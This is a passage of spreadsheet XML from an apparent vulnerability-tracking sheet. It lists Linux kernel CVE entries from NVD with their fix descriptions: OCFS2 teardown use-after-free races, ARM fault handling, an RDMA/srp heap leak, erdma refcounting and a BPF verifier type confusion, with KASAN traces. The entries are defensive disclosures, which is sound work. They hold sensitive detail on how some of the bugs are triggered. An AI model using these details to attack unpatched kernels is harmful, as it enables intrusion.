left to call o2hb_disarm_timeout().  Then unregister handlers before
tearing down handler-visible region state and make the drain wait for the
active or destroying o2net ordered workqueue before release frees reg.
The buggy scenario involves two paths, with each column showing the order
within that path:
region lifecycle:                late negotiate callback:
1. make_item() registers the     1. o2net_process_message() gets a
   region handlers before           heartbeat handler for reg.
   dev_store() has built a       2. The callback runs after the lookup
   runnable heartbeat context.      lock is dropped and dereferences reg.
2. A failed start or rmdir       3. An approve or timeout path tries to
   stops the heartbeat thread,      queue reg's delayed work, or release
   quiesces existing work, and      races the callback body after handler
   drops the final configfs ref.    unregister.
3. region_release() must drain   4. The callback or delayed work can
   handler-visible o2net rx work    outlive reg unless lifecycle code
   before freeing reg.              keeps the region non-armable and
                                    drains the active-or-destroying
                                    o2net workqueue.
Validation reproduced this kernel report:
KASAN slab-use-after-free in __run_timers+0x22c/0x5b0
Write of size 8
Call trace:
  dump_stack_lvl+0x66/0xa0
  print_report+0xce/0x630
  __run_timers+0x22c/0x5b0
  kasan_report+0xe0/0x110
  _raw_spin_unlock_irqrestore+0x27/0x60
  try_to_wake_up+0x191/0xf70
  timer_expire_remote+0xae/0xf0
  run_timer_softirq+0x19b/0x1a0
  handle_softirqs+0x156/0x660
  __irq_exit_rcu+0xc4/0x160
  irq_exit_rcu+0xe/0x20
  sysvec_apic_timer_interrupt+0x6c/0x80
  asm_sysvec_apic_timer_interrupt+0x1a/0x20
Allocated by task stack:
  kasan_save_stack+0x33/0x60
  kasan_save_track+0x14/0x30
  __kasan_kmalloc+0xaa/0xb0
  o2hb_heartbeat_group_make_item+0x3c/0x600</t>
        </is>
      </c>
      <c r="T669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90301</t>
        </is>
      </c>
    </row>
    <row r="670">
      <c r="A670" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B670" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90302</t>
        </is>
      </c>
      <c r="D670" s="5" t="inlineStr"/>
      <c r="E670" s="5" t="inlineStr"/>
      <c r="F670" s="5" t="inlineStr"/>
      <c r="G670" s="5" t="inlineStr"/>
      <c r="H670" s="5" t="inlineStr"/>
      <c r="I670" s="5" t="inlineStr"/>
      <c r="J670" s="5" t="inlineStr"/>
      <c r="K670" s="5" t="inlineStr"/>
      <c r="L670" s="5" t="inlineStr"/>
      <c r="M670" s="5" t="inlineStr"/>
      <c r="N670" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O670" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P670" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q670" s="5" t="inlineStr"/>
      <c r="R670" s="5" t="inlineStr"/>
      <c r="S670" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ocfs2: synchronize heartbeat callbacks with o2net teardown
Patch series "ocfs2: harden heartbeat teardown races".
This series fixes two OCFS2 heartbeat/o2net teardown races found by
KASAN.
This patch (of 2):
Heartbeat callbacks stay registered while configfs local-node teardown
enters o2net_stop_listening().  A node-down event can still run through
o2net_disconnect_node() and o2net_set_nn_state() while teardown is
destroying o2net_wq, so the later queue/flush operations can hit a dead
workqueue.  KASAN has caught this as a slab-use-after-free in
__queue_work() with the call chain:
KASAN slab-use-after-free in __queue_work+0x56/0xa90
Read of size 4
Call trace:
  dump_stack_lvl+0x66/0xa0
  print_report+0xce/0x630
  __queue_work+0x56/0xa90
  srso_alias_return_thunk+0x5/0xfbef5
  __virt_addr_valid+0x19f/0x330
  kasan_report+0xe0/0x110
  __queue_delayed_work+0x58/0x1e0
  queue_delayed_work_on+0xb4/0xc0
  o2net_set_nn_state+0x467/0x840
  o2net_disconnect_node+0x7b/0xe0
  o2net_hb_node_down_cb+0x54/0x60
  o2hb_run_event_list+0x236/0x2d0
  o2hb_check_slot+0xad4/0xbc0
  lock_release+0xc8/0x290
  o2hb_check_slot+0x9ea/0xbc0
  trace_hardirqs_on+0x18/0x130
  o2hb_do_disk_heartbeat+0x646/0xb30 (fs/ocfs2/cluster/heartbeat.c:1079)
  __lock_acquire+0x466/0x2260
  lockdep_hardirqs_on_prepare+0xea/0x1a0
  ktime_get_with_offset+0xe9/0x230
  o2hb_thread+0x14e/0x770
  kthread+0x1ad/0x1f0
  ret_from_fork+0x3c9/0x540
  __switch_to+0x2e9/0x730
  ret_from_fork_asm+0x1a/0x30
Allocated by task stack:
  kasan_save_stack+0x33/0x60
  kasan_save_track+0x14/0x30
  __kasan_kmalloc+0xaa/0xb0
  __kmalloc_noprof+0x292/0x760
  __alloc_workqueue+0x736/0xc60
  alloc_workqueue_noprof+0xb1/0x110
  o2net_start_listening+0xe5/0x430
  o2nm_node_local_store+0x184/0x310
  configfs_write_iter+0x18a/0x210
  vfs_write+0x469/0x810
  ksys_write+0xd2/0x170
  do_syscall_64+0x115/0x6a0 (arch/x86/entry/syscall_64.c:87)
  entry_SYSCALL_64_after_hwframe+0x77/0x7f
Freed by task stack:
  kasan_save_stack+0x33/0x60
  kasan_save_track+0x14/0x30
  kasan_save_free_info+0x3b/0x60
  __kasan_slab_free+0x5f/0x80
  kfree+0x313/0x590
  rcu_core+0x4f4/0x1320
  handle_softirqs+0x156/0x660
queue_delayed_work_on
o2net_set_nn_state
o2net_disconnect_node
o2net_hb_node_down_cb
o2hb_run_event_list
Keep heartbeat callbacks registered so quorum state still tracks node
state, but stop them from driving o2net reconnect/disconnect work once
local teardown starts. Mark the transport offline before destroying
o2net_wq, wait for any in-flight heartbeat callback to finish, and delay
bring-up replay until the new local node is published through
o2nm_this_node().
The replay also has to stay serialized with heartbeat callback delivery.
Otherwise a live-node snapshot can be copied, a real hb_down callback
can install -ENOTCONN for a peer, and the stale replay can call
o2net_hb_node_up() for that same peer and queue reconnect work even
though heartbeat is already down.
The buggy scenario involves two paths, with each column showing the order
within that path:
local-node teardown:                 heartbeat node-down callback:
1. configfs local-off enters         1. o2hb_run_event_list() invokes
   o2net_stop_listening().              o2net_hb_node_down_cb().
2. teardown heads for                2. the callback reaches
   destroy_workqueue(o2net_wq).         o2net_disconnect_node() and
                                        o2net_set_nn_state().
3. teardown destroys and NULLs       3. the callback flushes or queues
   o2net_wq.                            work through o2net_wq.</t>
        </is>
      </c>
      <c r="T670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90302</t>
        </is>
      </c>
    </row>
    <row r="671">
      <c r="A671" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B671" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90303</t>
        </is>
      </c>
      <c r="D671" s="5" t="inlineStr"/>
      <c r="E671" s="5" t="inlineStr"/>
      <c r="F671" s="5" t="inlineStr"/>
      <c r="G671" s="5" t="inlineStr"/>
      <c r="H671" s="5" t="inlineStr"/>
      <c r="I671" s="5" t="inlineStr"/>
      <c r="J671" s="5" t="inlineStr"/>
      <c r="K671" s="5" t="inlineStr"/>
      <c r="L671" s="5" t="inlineStr"/>
      <c r="M671" s="5" t="inlineStr"/>
      <c r="N671" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O671" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P671" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q671" s="5" t="inlineStr"/>
      <c r="R671" s="5" t="inlineStr"/>
      <c r="S671" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ARM: 9485/1: mm: acquire mmap write lock around show_pte() for user faults
When CONFIG_DEBUG_USER=y, and cmdline "user_debug=31" is set,
a user fault may trigger show_pte() without any lock.
If another thread in the same process concurrently calls munmap(),
the page table pages may be freed while show_pte() is still traversing
them, causing a use-after-free in show_pte().
If CONFIG_ARM_LPAE=y, this may cause a kernel panic if the pages table
of PMD are freed when show_pte() is running.
Acquire mmap_write_lock() around show_pte() for user faults to fix the
contention.
For user faults, additionally restrict that show_pte() is called only
when the addr is a user-space address (addr &lt; TASK_SIZE). This is because
the lock of tsk-&gt;mm only protects the virtual memory of user address space,
furthermore, dumping the page tables of a kernel-space address for user
faults is unnecessary and may have security implications.
Keep everything unchanged for kernel faults, because the kernel is
already in the "oops" state, acquiring a lock may risk a deadlock.</t>
        </is>
      </c>
      <c r="T671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90303</t>
        </is>
      </c>
    </row>
    <row r="672">
      <c r="A672" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B672" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90304</t>
        </is>
      </c>
      <c r="D672" s="5" t="inlineStr"/>
      <c r="E672" s="5" t="inlineStr"/>
      <c r="F672" s="5" t="inlineStr"/>
      <c r="G672" s="5" t="inlineStr"/>
      <c r="H672" s="5" t="inlineStr"/>
      <c r="I672" s="5" t="inlineStr"/>
      <c r="J672" s="5" t="inlineStr"/>
      <c r="K672" s="5" t="inlineStr"/>
      <c r="L672" s="5" t="inlineStr"/>
      <c r="M672" s="5" t="inlineStr"/>
      <c r="N672" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O672" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P672" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q672" s="5" t="inlineStr"/>
      <c r="R672" s="5" t="inlineStr"/>
      <c r="S672" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ARM: 9484/1: enable interrupts when unhandled user faults are triggered
PREEMPT_RT requires interrupts to be enabled when sending signals.
When do_DataAbort()/do_PrefetchAbort() triggers unhandled user faults,
that is `inf-&gt;fn()` return a non-zero value, and the interrupts are not
enabled within the hook function, force_sig_fault() will be called
with interrupts disabled.
This can be triggered by user programs executing the bkpt instruction,
with kernel config CONFIG_PERF_EVENTS=n.
Enable interrupts in do_DataAbort()/do_PrefetchAbort() when unhandled
user faults are triggered to fix the issue.</t>
        </is>
      </c>
      <c r="T672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90304</t>
        </is>
      </c>
    </row>
    <row r="673">
      <c r="A673" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B673" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90305</t>
        </is>
      </c>
      <c r="D673" s="5" t="inlineStr"/>
      <c r="E673" s="5" t="inlineStr"/>
      <c r="F673" s="5" t="inlineStr"/>
      <c r="G673" s="5" t="inlineStr"/>
      <c r="H673" s="5" t="inlineStr"/>
      <c r="I673" s="5" t="inlineStr"/>
      <c r="J673" s="5" t="inlineStr"/>
      <c r="K673" s="5" t="inlineStr"/>
      <c r="L673" s="5" t="inlineStr"/>
      <c r="M673" s="5" t="inlineStr"/>
      <c r="N673" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O673" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P673" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q673" s="5" t="inlineStr"/>
      <c r="R673" s="5" t="inlineStr"/>
      <c r="S673" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ARM: 9483/1: select HAVE_POSIX_CPU_TIMERS_TASK_WORK
Commit c6e61c06d606 ("ARM: 9463/1: Allow to enable RT") enabled PREEMPT_RT
on ARM but did not select HAVE_POSIX_CPU_TIMERS_TASK_WORK. This leaves
CONFIG_POSIX_CPU_TIMERS_TASK_WORK disabled, so CPU timers expire in hard
IRQ context.
On PREEMPT_RT this makes run_posix_cpu_timers() take the sleeping
sighand-&gt;siglock:
  BUG: sleeping function called from invalid context at spinlock_rt.c:48
    rt_spin_lock from lock_task_sighand
    lock_task_sighand from run_posix_cpu_timers
    run_posix_cpu_timers from update_process_times
ARM handles TIF_NOTIFY_RESUME on all return-to-user paths, including v7-M.
ARM32 KVM host support was removed by commit 541ad0150ca4 ("arm: Remove
32bit KVM host support"), so the select need not be conditional on KVM.
Select it to defer POSIX CPU timer expiry to task context.
Reproduced with setrlimit(RLIMIT_CPU, ...) and a busy loop. The same path
is used by setitimer(ITIMER_PROF or ITIMER_VIRTUAL) and POSIX CPU timers
created with timer_create().</t>
        </is>
      </c>
      <c r="T673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90305</t>
        </is>
      </c>
    </row>
    <row r="674">
      <c r="A674" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B674" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90306</t>
        </is>
      </c>
      <c r="D674" s="5" t="inlineStr"/>
      <c r="E674" s="5" t="inlineStr"/>
      <c r="F674" s="5" t="inlineStr"/>
      <c r="G674" s="5" t="inlineStr"/>
      <c r="H674" s="5" t="inlineStr"/>
      <c r="I674" s="5" t="inlineStr"/>
      <c r="J674" s="5" t="inlineStr"/>
      <c r="K674" s="5" t="inlineStr"/>
      <c r="L674" s="5" t="inlineStr"/>
      <c r="M674" s="5" t="inlineStr"/>
      <c r="N674" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O674" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P674" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q674" s="5" t="inlineStr"/>
      <c r="R674" s="5" t="inlineStr"/>
      <c r="S674" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ARM: 9481/2: breakpoint: CFI breakpoints only on demand
This removes the stub hw_breakpoint_cfi_handler() from ARM, making
it not steal breakpoint type 0x03 (ARM_ENTRY_CFI_BREAKPOINT) unless
CFI is actively used in the kernel.
When not instrumenting with CFI, or when a breakpoint is issued in
userspace, we fall through to return 1 from hw_breakpoint_pending()
"unhandled fault" so userspace can make use of this breakpoint.
Tested with LKDTM and this command line:
echo CFI_FORWARD_PROTO &gt; /sys/kernel/debug/provoke-crash/DIRECT
still works as expected.</t>
        </is>
      </c>
      <c r="T674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90306</t>
        </is>
      </c>
    </row>
    <row r="675">
      <c r="A675" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B675" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90307</t>
        </is>
      </c>
      <c r="D675" s="5" t="inlineStr"/>
      <c r="E675" s="5" t="inlineStr"/>
      <c r="F675" s="5" t="inlineStr"/>
      <c r="G675" s="5" t="inlineStr"/>
      <c r="H675" s="5" t="inlineStr"/>
      <c r="I675" s="5" t="inlineStr"/>
      <c r="J675" s="5" t="inlineStr"/>
      <c r="K675" s="5" t="inlineStr"/>
      <c r="L675" s="5" t="inlineStr"/>
      <c r="M675" s="5" t="inlineStr"/>
      <c r="N675" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O675" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P675" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q675" s="5" t="inlineStr"/>
      <c r="R675" s="5" t="inlineStr"/>
      <c r="S675" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/srp: fix heap information leak on a truncated SRP_CRED_REQ
srp_recv_done() passes wc-&gt;byte_len to srp_process_rsp(). It passes
nothing to srp_process_cred_req() and srp_process_aer_req(), which read
fixed-size fields from the receive buffer without checking that those
fields were received.
The buffer size is max_ti_iu_len, which comes from the login response
and is not validated. A target that advertises 8 and then sends an
8-byte SRP_CRED_REQ makes the initiator read req-&gt;tag from beyond the
end of the buffer. req-&gt;tag is copied into the SRP_CRED_RSP and sent
back, so those bytes reach the target. SRP_AER_REQ behaves the same way
and also reads req-&gt;lun.
The leak is 8 bytes per response. max_ti_iu_len also decides which slab
cache the buffer comes from. With 8 the buffer is a kmalloc-8 object and
the read is entirely outside it:
  BUG: KASAN: slab-out-of-bounds in srp_recv_done+0x172b/0x1aa0
  Read of size 8 at addr ffff888104714da8 by task kworker/u8:3/50
   which belongs to the cache kmalloc-8 of size 8
  The buggy address is located 0 bytes to the right of
   allocated 8-byte region [ffff888104714da0, ffff888104714da8)
Without KASAN the returned bytes are whatever is next in the slab. One
run returned ".strtab".
rsp-&gt;data[3] in srp_process_rsp() has the same problem: only
resp_data_len is checked before it is read.
Drop a request that is shorter than the structure being parsed, and
check byte_len before the tsk_mgmt read.</t>
        </is>
      </c>
      <c r="T675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90307</t>
        </is>
      </c>
    </row>
    <row r="676">
      <c r="A676" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B676" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90308</t>
        </is>
      </c>
      <c r="D676" s="5" t="inlineStr"/>
      <c r="E676" s="5" t="inlineStr"/>
      <c r="F676" s="5" t="inlineStr"/>
      <c r="G676" s="5" t="inlineStr"/>
      <c r="H676" s="5" t="inlineStr"/>
      <c r="I676" s="5" t="inlineStr"/>
      <c r="J676" s="5" t="inlineStr"/>
      <c r="K676" s="5" t="inlineStr"/>
      <c r="L676" s="5" t="inlineStr"/>
      <c r="M676" s="5" t="inlineStr"/>
      <c r="N676" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O676" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P676" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q676" s="5" t="inlineStr"/>
      <c r="R676" s="5" t="inlineStr"/>
      <c r="S676" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/erdma: Hold QP references for AE and CM processing
AE QP fatal events and iWARP CM paths load QPs from dev-&gt;qp_xa
and then use or reference them outside the xarray lock.
erdma_destroy_qp() can drop the destroy-path reference and free QP
resources while such a lookup is in flight.
Add erdma_qp_get_by_qpn() to acquire a kref under the xarray
lock with kref_get_unless_zero(). Remove the QP from the xarray
before dropping the destroy-path reference so no new lookup can acquire
it while destruction waits for existing users.</t>
        </is>
      </c>
      <c r="T676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90308</t>
        </is>
      </c>
    </row>
    <row r="677">
      <c r="A677" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B677" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90309</t>
        </is>
      </c>
      <c r="D677" s="5" t="inlineStr"/>
      <c r="E677" s="5" t="inlineStr"/>
      <c r="F677" s="5" t="inlineStr"/>
      <c r="G677" s="5" t="inlineStr"/>
      <c r="H677" s="5" t="inlineStr"/>
      <c r="I677" s="5" t="inlineStr"/>
      <c r="J677" s="5" t="inlineStr"/>
      <c r="K677" s="5" t="inlineStr"/>
      <c r="L677" s="5" t="inlineStr"/>
      <c r="M677" s="5" t="inlineStr"/>
      <c r="N677" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O677" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P677" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q677" s="5" t="inlineStr"/>
      <c r="R677" s="5" t="inlineStr"/>
      <c r="S677" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/erdma: Hold CQ references when processing EQ events
EQ handlers look up CQs from dev-&gt;cq_xa and invoke CQ completion or
error callbacks outside the xarray lock. erdma_destroy_cq() can erase the
CQ from the xarray and free its queue buffer and doorbell record while a
previously scheduled EQ handler is still using the CQ.
Add a CQ refcount and take a reference under the xarray lock with
refcount_inc_not_zero(). Remove the CQ from the xarray before dropping
the destroy-path reference, then wait for in-flight EQ users before
releasing CQ resources.</t>
        </is>
      </c>
      <c r="T677" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90309</t>
        </is>
      </c>
    </row>
    <row r="678">
      <c r="A678" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B678" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C678" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90310</t>
        </is>
      </c>
      <c r="D678" s="5" t="inlineStr"/>
      <c r="E678" s="5" t="inlineStr"/>
      <c r="F678" s="5" t="inlineStr"/>
      <c r="G678" s="5" t="inlineStr"/>
      <c r="H678" s="5" t="inlineStr"/>
      <c r="I678" s="5" t="inlineStr"/>
      <c r="J678" s="5" t="inlineStr"/>
      <c r="K678" s="5" t="inlineStr"/>
      <c r="L678" s="5" t="inlineStr"/>
      <c r="M678" s="5" t="inlineStr"/>
      <c r="N678" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O678" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P678" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q678" s="5" t="inlineStr"/>
      <c r="R678" s="5" t="inlineStr"/>
      <c r="S678" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xen/xenbus: check otherend_id only after it has been initialized
When device just got initialized (for example on module load), the
otherend_id field is initialized only after
xenbus_read_otherend_details() gets called. If xenstore watch triggers
xenbus_dev_changed() before that, it might consider still zeroed
otherend_id field (not matching actual xenstore content) as a sign of
device state reset. It can happen because xenstore watch are handled in
another thread (xenwatch), which can run in parallel to the initial
device probe running at module load. In that case, it would call
device_unregister(), which would deadlock against device probe from
module init.
Fix this by considering dev-&gt;otherend_id change only after dev-&gt;otherend
is set (which happen after otherend_id is initialized).</t>
        </is>
      </c>
      <c r="T678" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90310</t>
        </is>
      </c>
    </row>
    <row r="679">
      <c r="A679" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B679" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C679" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90311</t>
        </is>
      </c>
      <c r="D679" s="5" t="inlineStr"/>
      <c r="E679" s="5" t="inlineStr"/>
      <c r="F679" s="5" t="inlineStr"/>
      <c r="G679" s="5" t="inlineStr"/>
      <c r="H679" s="5" t="inlineStr"/>
      <c r="I679" s="5" t="inlineStr"/>
      <c r="J679" s="5" t="inlineStr"/>
      <c r="K679" s="5" t="inlineStr"/>
      <c r="L679" s="5" t="inlineStr"/>
      <c r="M679" s="5" t="inlineStr"/>
      <c r="N679" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O679" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P679" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q679" s="5" t="inlineStr"/>
      <c r="R679" s="5" t="inlineStr"/>
      <c r="S679" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
thermal: hwmon: Remove hwmon class device along with its parent
The current code creates one hwmon device per thermal zone type and that
device is registered under the first thermal zone of the given type.
That turns out to be problematic when the thermal zone holding the
hwmon device is removed.
For example, say that there are two ACPI thermal zones on a system
 /sys/devices/virtual/thermal/thermal_zone0/
 /sys/devices/virtual/thermal/thermal_zone1/
The current code registers a hwmon class device for thermal_zone0 only:
 /sys/devices/virtual/thermal/thermal_zone0/hwmon0/
because the type is "acpitz" for both of them, but it adds a sysfs
attribute that belongs to thermal_zone1 under it:
 /sys/devices/virtual/thermal/thermal_zone0/hwmon0/temp2_input
There is also
 /sys/devices/virtual/thermal/thermal_zone0/hwmon0/temp1_input
which belongs to thermal_zone0.
When thermal_zone0 is removed, say because the ACPI thermal driver is
unbound from the underlying platform device, thermal_remove_hwmon_sysfs()
skips the removal of hwmon0 because of the temp2_input attribute
belonging to thermal_zone1 which effectively prevents thermal_zone0
removal from making progress.
Address this by making thermal_remove_hwmon_sysfs() remove the entire
hwmon class device interface for the given thermal zone type when the
thermal zone device holding it is removed.
To prevent races with thermal_add_hwmon_sysfs() that may interfere
with this, carry out the entire addition and removal of hwmon sysfs
interfaces for thermal zones under thermal_hwmon_list_lock.
Also adjust the layout of the labels in thermal_add_hwmon_sysfs() to
the current kernel coding style to align with the new "unlock" label.</t>
        </is>
      </c>
      <c r="T679" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90311</t>
        </is>
      </c>
    </row>
    <row r="680">
      <c r="A680" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B680" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C680" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90312</t>
        </is>
      </c>
      <c r="D680" s="5" t="inlineStr"/>
      <c r="E680" s="5" t="inlineStr"/>
      <c r="F680" s="5" t="inlineStr"/>
      <c r="G680" s="5" t="inlineStr"/>
      <c r="H680" s="5" t="inlineStr"/>
      <c r="I680" s="5" t="inlineStr"/>
      <c r="J680" s="5" t="inlineStr"/>
      <c r="K680" s="5" t="inlineStr"/>
      <c r="L680" s="5" t="inlineStr"/>
      <c r="M680" s="5" t="inlineStr"/>
      <c r="N680" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O680" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P680" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q680" s="5" t="inlineStr"/>
      <c r="R680" s="5" t="inlineStr"/>
      <c r="S680" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Check load-acquire src ptr type before the load
check_atomic_load() calls check_load_mem() before atomic_ptr_type_ok().
For a load-acquire that fetches into its own source register (dst_reg ==
src_reg), check_load_mem() overwrites src_reg's type with the type of the
loaded value, so the subsequent atomic_ptr_type_ok() no longer sees the
source pointer and fails to reject the disallowed types (ctx, pkt,
flow_keys, sock).
Since bpf_convert_ctx_accesses() does not rewrite atomic loads, the raw
access to the underlying kernel object is left in place. The destination
type is taken from the ctx access itself, so a load-acquire of the sk
field of struct __sk_buff for example leaves the register typed as
PTR_TO_SOCK_COMMON_OR_NULL, which type_is_sk_pointer() does not match
either, while it actually holds unconverted struct sk_buff bytes. Once
the NULL check has passed this is a type confusion, not just a leak of
kernel data.
Validate src_reg with check_reg_arg() and check the source pointer type
with atomic_ptr_type_ok() before the load again, mirroring
check_atomic_rmw(). Out-of-range register numbers are already rejected
earlier by check_and_resolve_insns() (commit 503d21ef8eac ("bpf: Do
register range validation early")), and the only exemption there,
is_stack_arg_ldx(), requires BPF_LDX | BPF_MEM | BPF_DW and thus never
matches a BPF_ATOMIC insn. atomic_ptr_type_ok() can therefore not
dereference register state out of bounds, that is, the out-of-bounds
read addressed by the Fixes commit below does not reappear (as proven
also via selftest).</t>
        </is>
      </c>
      <c r="T680" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90312</t>
        </is>
      </c>
    </row>
    <row r="681">
      <c r="A681" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B681" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C681" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90313</t>
        </is>
      </c>
      <c r="D681" s="5" t="inlineStr"/>
      <c r="E681" s="5" t="inlineStr"/>
      <c r="F681" s="5" t="inlineStr"/>
      <c r="G681" s="5" t="inlineStr"/>
      <c r="H681" s="5" t="inlineStr"/>
      <c r="I681" s="5" t="inlineStr"/>
      <c r="J681" s="5" t="inlineStr"/>
      <c r="K681" s="5" t="inlineStr"/>
